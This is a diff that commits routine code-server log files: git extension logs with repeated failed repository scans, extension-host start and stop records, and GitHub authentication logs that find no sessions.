+2026-02-01 10:47:08.561 [info] [main] Using git "2.39.5" from "git" +2026-02-01 10:47:08.561 [info] [Model][doInitialScan] Initial repository scan started +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 10:47:08.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.561 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-02-01 10:47:08.728 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.728 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:08.774 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:08.774 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 10:47:10.363 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 10:47:10.363 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 11:23:26.890 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 11:23:26.890 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 12:54:10.976 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 12:54:10.976 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 12:54:28.006 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 12:54:28.006 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 12:54:40.469 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 12:54:40.469 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 12:54:42.874 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 12:54:42.875 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 12:54:56.452 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 12:54:56.452 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 15:02:23.865 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 15:02:23.865 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 15:02:59.270 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 15:02:59.270 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 15:04:14.715 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 15:04:14.715 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 15:04:16.559 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 15:04:16.560 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..a059fe2 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-02-01 10:47:08.344 [info] Reading sessions from keychain... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.344 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.344 [info] Got 0 sessions for ... +2026-02-01 10:47:08.395 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.396 [info] Got 0 sessions for ... +2026-02-01 10:47:08.440 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.441 [info] Got 0 sessions for ... +2026-02-01 10:47:08.441 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.441 [info] Got 0 sessions for ... +2026-02-01 10:47:08.441 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.441 [info] Got 0 sessions for ... +2026-02-01 10:47:08.441 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.441 [info] Got 0 sessions for ... +2026-02-01 10:47:08.441 [info] Getting sessions for all scopes... +2026-02-01 10:47:08.441 [info] Got 0 sessions for ... +2026-02-01 10:47:10.358 [info] Getting sessions for all scopes... +2026-02-01 10:47:10.358 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github/GitHub.log new file mode 100755 index 0000000..a6b4d98 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost5/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-02-01 10:47:08.562 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/remoteexthost.log new file mode 100755 index 0000000..294f8a2 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/remoteexthost.log @@ -0,0 +1,14 @@ +2026-02-01 22:43:12.931 [info] Extension host with pid 301229 started +2026-02-01 22:43:12.938 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-02-01 22:43:13.091 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-02-01 22:43:13.092 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-02-01 22:43:13.197 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-02-01 22:43:13.342 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-02-01 22:43:13.342 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-02-01 22:43:13.484 [info] Eager extensions activated +2026-02-01 22:43:13.485 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-02-01 22:43:13.485 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-02-01 22:43:13.521 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-02-02 01:36:05.142 [info] Extension host terminating: received terminate message from renderer +2026-02-02 01:36:05.143 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-02-02 01:36:05.173 [info] Extension host with pid 301229 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.git/Git.log new file mode 100755 index 0000000..14e9dfb --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.git/Git.log @@ -0,0 +1,77 @@ +2026-02-01 22:43:13.645 [info] [main] Log level: Info +2026-02-01 22:43:13.645 [info] [main] Validating found git in: "git" +2026-02-01 22:43:13.645 [info] [main] Using git "2.39.5" from "git" +2026-02-01 22:43:13.645 [info] [Model][doInitialScan] Initial repository scan started +2026-02-01 22:43:13.645 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 22:43:13.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.645 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 22:43:13.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.645 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.645 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 22:43:13.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.649 [info] > git rev-parse --show-toplevel [10ms] +2026-02-01 22:43:13.649 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.654 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 22:43:13.654 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.659 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 22:43:13.659 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.663 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.663 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.669 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.669 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.674 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 22:43:13.675 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.678 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.678 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.688 [info] > git rev-parse --show-toplevel [7ms] +2026-02-01 22:43:13.688 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.692 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.692 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.697 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 22:43:13.697 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.701 [info] > git rev-parse --show-toplevel [2ms] +2026-02-01 22:43:13.701 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.704 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-02-01 22:43:13.708 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:13.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:13.823 [info] > git rev-parse --show-toplevel [4ms] +2026-02-01 22:43:13.823 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:15.099 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:15.099 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:16.615 [info] > git rev-parse --show-toplevel [3ms] +2026-02-01 22:43:16.615 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 22:43:46.881 [info] > git rev-parse --show-toplevel [1ms] +2026-02-01 22:43:46.881 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-01 23:42:50.645 [info] > git rev-parse --show-toplevel [4ms] +2026-02-01 23:42:50.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 01:36:01.077 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 01:36:01.077 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 01:36:02.104 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 01:36:02.104 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 01:36:03.167 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 01:36:03.168 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..4f400f2 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-02-01 22:43:13.410 [info] Reading sessions from keychain... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.410 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.410 [info] Got 0 sessions for ... +2026-02-01 22:43:13.411 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.411 [info] Got 0 sessions for ... +2026-02-01 22:43:13.438 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.438 [info] Got 0 sessions for ... +2026-02-01 22:43:13.438 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.438 [info] Got 0 sessions for ... +2026-02-01 22:43:13.439 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.439 [info] Got 0 sessions for ... +2026-02-01 22:43:13.439 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.439 [info] Got 0 sessions for ... +2026-02-01 22:43:13.439 [info] Getting sessions for all scopes... +2026-02-01 22:43:13.439 [info] Got 0 sessions for ... +2026-02-01 22:43:15.095 [info] Getting sessions for all scopes... +2026-02-01 22:43:15.095 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github/GitHub.log new file mode 100755 index 0000000..41889d9 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost6/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-02-01 22:43:13.649 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/remoteexthost.log new file mode 100755 index 0000000..d60d938 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/remoteexthost.log @@ -0,0 +1,11 @@ +2026-02-02 22:14:29.461 [info] Extension host with pid 332306 started +2026-02-02 22:14:29.476 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-02-02 22:14:29.622 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-02-02 22:14:29.697 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-02-02 22:14:29.716 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-02-02 22:14:29.716 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-02-02 22:14:29.886 [info] Eager extensions activated +2026-02-02 22:14:29.886 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-02-02 22:14:29.886 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-02-02 22:14:30.345 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-02-02 23:14:12.050 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.git/Git.log new file mode 100755 index 0000000..a77e0ba --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.git/Git.log @@ -0,0 +1,56 @@ +2026-02-02 22:14:29.932 [info] [main] Log level: Info +2026-02-02 22:14:29.932 [info] [main] Validating found git in: "git" +2026-02-02 22:14:29.932 [info] [main] Using git "2.39.5" from "git" +2026-02-02 22:14:29.932 [info] [Model][doInitialScan] Initial repository scan started +2026-02-02 22:14:29.932 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:29.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.932 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.932 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.932 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.956 [info] > git rev-parse --show-toplevel [25ms] +2026-02-02 22:14:29.956 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.961 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.961 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.966 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.966 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.971 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:29.971 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.975 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:29.975 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.979 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.979 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.985 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:29.985 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.990 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:29.990 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.995 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.995 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:29.999 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:29.999 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:30.003 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:30.003 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:30.006 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-02-02 22:14:30.466 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 22:14:30.466 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 22:14:31.064 [info] > git rev-parse --show-toplevel [1ms] +2026-02-02 22:14:31.064 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-02-02 23:14:12.102 [info] > git rev-parse --show-toplevel [2ms] +2026-02-02 23:14:12.102 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..9ed4e04 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost7/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-02-02 22:14:29.910 [info] Reading sessions from keychain... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] Getting sessions for all scopes... +2026-02-02 22:14:29.910 [info] Got 0 sessions for ... +2026-02-02 22:14:29.910 [info] 